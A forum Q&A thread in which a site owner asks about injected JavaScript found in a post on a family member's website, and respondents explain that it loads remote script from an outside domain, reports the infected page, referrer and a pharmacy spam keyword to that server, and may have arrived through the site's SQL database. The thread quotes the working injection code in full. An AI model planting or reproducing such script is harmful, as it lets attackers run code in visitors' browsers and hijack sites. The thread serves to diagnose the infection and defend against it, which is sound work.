Malicious javascript posted in forum

Question

<SCRIPT>
  ff = 0;
  for (nn in document) if (nn == 'etours' || nn == 'logo-anim') ff = 1;
  if (ff == 0 || (/LIVE|MSN|YAHOO|GENERIC|NORVASC/.test (document.referrer.toUpperCase ()) && false ) ) {
    document.write('<SCRIPT SRC ="http://p090303.info/w.php?l='+ escape(location.href) + '&k=' + escape('generic norvasc') + '&r=' + escape(document.referrer) + '"><' + '/SCRIPT>' ); document.write ('<' + '!--' );
  }
</SCRIPT>

Recognize this code? I see it's stuck in a number of websites, but all the characters have been replaced with their hex or octal equivalent. Someone posted this code in a post on one of my dad's sites, but I can't quite figure out what it's doing. It seems to be harvesting mappings of web pages to referrers, but I can't figure out what the first few lines are doing. Anyone have any idea what's going on here?

Answer 1

It's writing a script tag to the page, pointing to their javascript. Their javascript will be executed on your website, making them do whatever they please to your website.

The first few lines are just some checks on variables that are probably created within their script. Maybe something to do with checking if the script tag has already been written.

Answer 2

It's checking for dependencies (javascript variables set by other code), then it dials home to let the home server know what page it successfully infected. Home appears to be here in Kiev.

Answer 3

The question is: How this code was introduced is the HTML page? According our search it is associated with a SQL data base. This script is introduced by someway and I would like to know how it is recorded in the SQL data base.